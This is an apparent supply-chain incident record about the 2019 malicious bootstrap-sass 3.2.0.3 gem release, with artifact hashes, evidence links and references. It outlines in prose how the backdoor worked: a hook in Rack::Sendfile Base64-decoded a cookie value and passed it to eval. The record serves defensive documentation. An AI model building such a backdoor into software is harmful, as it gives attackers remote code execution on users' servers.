bootstrap-sass gem enabled remote execution
The popular bootstrap-sass Ruby gem had malicious version 3.2.0.3 published to RubyGems.org after a likely maintainer account compromise.
Story
The bootstrap-sass compromise used the real RubyGems package name. On March 26, 2019, version 3.2.0.3 appeared on RubyGems without a matching GitHub release or changelog trail. The previous 3.2.0.2 release was also removed.
A user noticed the mismatch, diffed the gem, and found a production-only Rails backdoor. The payload hooked Rack::Sendfile, read a ___cfduid cookie, Base64-decoded its value, and passed the result to eval.
That made any affected Rails production app an execution surface if it accepted a crafted request. The attacker did not need a new application bug. The dependency supplied the bug, loaded inside normal Rails middleware.
Maintainers confirmed the malicious code, removed 3.2.0.3, reset credentials, and later published 3.2.0.4 as the clean replacement for the 3.2 line. The event showed how a quiet registry-only release can outrun source repository review.
Affected Artifacts
bootstrap-sass
- Observed
- 2019-03-26
- Compromised Versions
-
- 3.2.0.3
- Fixed
- Not listed
- Hashes
-
- sha256:366d6162fe36fc81dadc114558b43c6c8890c8bcc7e90e2949ae6344d0785dc0
- Evidence
- distribution: rubygems.org/gems/bootstrap-sass/versions/3.2.0.3, mirror: ironin.it/blog/malicious-backdoor-code-found-in-the-bootstrap-sass-ruby-gem.html, cookie: ___cfduid, function: Rack::Sendfile , +1 more
Incident Context
- Motive
- Unauthorized Access Control
- Attribution
- Person
- Cause
- Compromised Account Credentials
- Transitive
- No
- Actor
- Individual Hacker
- User Impact
- 1477
External References
- 3.2.0.3?github.com
- Backdoor code found in popular bootstrap-sass Ruby libraryzdnet.com
- Malicious Backdoor Code Found in the Bootstrap-sass Ruby Gemironin.it
- Backdoor found in popular Ruby gemcyberscoop.com
Source record: oss/attacks/bootstrap-sass/meta.yaml